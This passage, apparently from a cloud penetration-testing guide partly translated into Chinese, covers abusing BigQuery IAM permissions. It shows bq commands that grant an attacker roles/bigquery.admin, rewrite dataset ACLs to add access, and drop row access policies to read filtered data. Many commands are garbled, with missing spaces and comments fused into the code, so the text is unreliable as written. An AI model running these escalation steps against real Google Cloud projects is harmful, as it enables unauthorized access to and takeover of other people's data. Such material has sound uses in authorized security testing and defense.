# For this you also need bigquery.tables.getIamPolicybqadd-iam-policy-binding \--member='user:<email>' \--role='roles/bigquery.admin' \<proj>:<dataset># use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
bigquery.datasets.update, (bigquery.datasets.get)
仅此权限允许通过修改指示谁可以访问的ACL来更新您对BigQuery数据集的访问权限:
# Download current permissions, reqires bigquery.datasets.getbqshow--format=prettyjson<proj>:<dataset>>acl.json## Give permissions to the desired userbqupdate--sourceacl.json<proj>:<dataset>## Read it withbqhead $PROJECT_ID:<dataset>.<table>
bigquery.tables.setIamPolicy
攻击者可以利用此权限为自己提供更多权限,以便对 BigQuery 表进行操作:
# For this you also need bigquery.tables.setIamPolicybqadd-iam-policy-binding \--member='user:<email>' \--role='roles/bigquery.admin' \<proj>:<dataset>.<table># use the set-iam-policy if you don't have bigquery.tables.setIamPolicy
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used
# Remove onebqquery--nouse_legacy_sql'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'# Remove all (if it's the last row policy you need to use thisbqquery--nouse_legacy_sql'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'
另一个绕过行访问策略的潜在选项是更改受限数据的值。如果您只能在 term 为 Cfba 时查看,则只需将表中的所有记录修改为 term = "Cfba"。但是,这被 bigquery 阻止了。